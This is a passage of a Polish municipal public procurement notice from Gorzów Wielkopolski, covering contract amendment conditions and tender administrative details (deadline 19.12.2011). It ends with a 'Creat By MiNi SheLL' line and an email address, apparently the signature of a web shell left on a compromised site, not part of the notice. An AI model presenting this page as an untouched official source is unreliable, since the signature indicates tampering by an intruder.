a.gdy zmiany te dotyczyć będą powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron;
b.gdy konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany są korzystne dla Zamawiającego;
c. z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego;
d.z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w  szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
e.z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.
f.Zamawiający dopuszcza zmianę osób  odpowiedzialnych za wykonanie zamówienia, pod warunkiem, że wystąpią następujące przypadki:
-śmierć, choroba lub inne zdarzenie losowe,
-nie wywiązywanie się tych osób z obowiązków wynikających z przepisów Prawa budowlanego, lub przepisów,
-rezygnacja tych osób z wykonywania swoich obowiązków</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gorzow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Gorzowa Wlkp.; ul. Sikorskiego 3-4; 66-400 Gorzów Wlkp..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2011 godzina 10:00, miejsce: Urząd Miasta Gorzowa Wlkp. 66-400 Gorzów Wlkp. ul. Sikorskiego 3-4, Kancelaria Ogólna (parter)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com